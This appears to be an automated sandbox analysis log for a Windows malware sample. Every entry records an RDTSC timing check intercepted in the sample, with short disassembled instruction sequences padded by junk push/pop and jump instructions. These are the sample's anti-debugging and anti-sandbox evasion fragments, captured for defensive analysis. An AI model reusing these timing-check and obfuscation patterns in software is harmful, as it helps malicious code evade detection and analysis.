                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E103B2 second address: E103D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC734E5F77Dh 0x0000000c jmp 00007FC734E5F77Ah 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E103D0 second address: E103EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E10687 second address: E10694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E10694 second address: E10698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E10698 second address: E1069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27D8F second address: E27DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FC734882076h 0x00000011 jl 00007FC734882076h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27DA6 second address: E27DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27DAA second address: E27DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E27DBB second address: E27DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F77Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E2F5D0 second address: E2F5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E2F5D6 second address: E2F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC734E5F77Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3687D second address: E3689E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734882076h 0x00000008 jmp 00007FC734882087h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36A09 second address: E36A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36A0D second address: E36A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BB2 second address: E36BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BB6 second address: E36BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC734882085h 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BD1 second address: E36BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E36BD7 second address: E36BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3702A second address: E37051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FC734E5F781h 0x0000000d push eax 0x0000000e jmp 00007FC734E5F77Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E371A2 second address: E371C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC734882076h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007FC73488207Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E37341 second address: E37349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E37DC7 second address: E37DE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FC734882076h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC73488207Bh 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E37DE5 second address: E37DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3BAA5 second address: E3BAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC73488207Eh 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E3BAB8 second address: E3BAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F787h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E48371 second address: E48375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E48375 second address: E48383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E48383 second address: E48387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E48387 second address: E4838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E4838B second address: E4839A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E4FBBB second address: E4FBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E62623 second address: E62627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E62627 second address: E6262B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E6262B second address: E62631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E62631 second address: E6264E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F782h 0x00000007 pushad 0x00000008 je 00007FC734E5F776h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7B568 second address: E7B575 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A2EB second address: E7A2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A2EF second address: E7A2F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A2F5 second address: E7A2FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A46E second address: E7A474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A474 second address: E7A478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A478 second address: E7A47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A47C second address: E7A4A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC734E5F77Ch 0x0000000d pushad 0x0000000e ja 00007FC734E5F77Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007FC734E5F776h 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A4A3 second address: E7A4AD instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734882076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A4AD second address: E7A4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A789 second address: E7A78D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A78D second address: E7A79D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC734E5F77Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A79D second address: E7A7AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A7AA second address: E7A7C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Fh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A947 second address: E7A94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A94F second address: E7A992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F787h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FC734E5F778h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 jns 00007FC734E5F787h 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007FC734E5F77Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7A992 second address: E7A9A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7AE6E second address: E7AE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007FC734E5F776h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7AE81 second address: E7AE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7AE85 second address: E7AE91 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F776h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7CC08 second address: E7CC0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E7FAF1 second address: E7FAFB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: E81385 second address: E81389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0F4C second address: 51A0F52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0F52 second address: 51A0F5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E8C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0F5B second address: 51A0F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F788h 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0F7D second address: 51A0FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 11D4h 0x00000007 pushfd 0x00000008 jmp 00007FC73488207Dh 0x0000000d xor ecx, 1205C896h 0x00000013 jmp 00007FC734882081h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007FC73488207Eh 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FC734882087h 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51A0FD7 second address: 51A0FDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190E22 second address: 5190F02 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007FC734882086h 0x0000000d jmp 00007FC734882085h 0x00000012 popfd 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov edx, eax 0x00000018 pushfd 0x00000019 jmp 00007FC734882088h 0x0000001e xor eax, 5C9D5EC8h 0x00000024 jmp 00007FC73488207Bh 0x00000029 popfd 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d mov ch, bh 0x0000002f movzx ecx, dx 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FC734882089h 0x0000003b sub ax, AE96h 0x00000040 jmp 00007FC734882081h 0x00000045 popfd 0x00000046 pushfd 0x00000047 jmp 00007FC734882080h 0x0000004c sub ch, FFFFFFB8h 0x0000004f jmp 00007FC73488207Bh 0x00000054 popfd 0x00000055 popad 0x00000056 mov ebp, esp 0x00000058 jmp 00007FC734882086h 0x0000005d pop ebp 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190F02 second address: 5190F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190F06 second address: 5190F0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190F0C second address: 5190F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51E0082 second address: 51E0096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, CD9Bh 0x00000007 mov bx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51E0096 second address: 51E009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51E009A second address: 51E00A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51E00A9 second address: 51E0110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC734E5F77Eh 0x00000010 pop ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FC734E5F77Eh 0x00000018 add ax, 7128h 0x0000001d jmp 00007FC734E5F77Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC734E5F786h 0x0000002a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170133 second address: 5170137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170137 second address: 517013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517013B second address: 5170141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170141 second address: 5170150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170150 second address: 5170154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170154 second address: 5170169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov cx, F6E3h 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170169 second address: 51701A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC73488207Fh 0x00000008 pop eax 0x00000009 call 00007FC734882089h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push dword ptr [ebp+0Ch] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movzx ecx, di 0x0000001b push ebx 0x0000001c pop eax 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190B60 second address: 5190B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ecx 0x00000011 mov ax, dx 0x00000014 popad 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190B7D second address: 5190B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882080h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190B99 second address: 5190B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190B9D second address: 5190BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
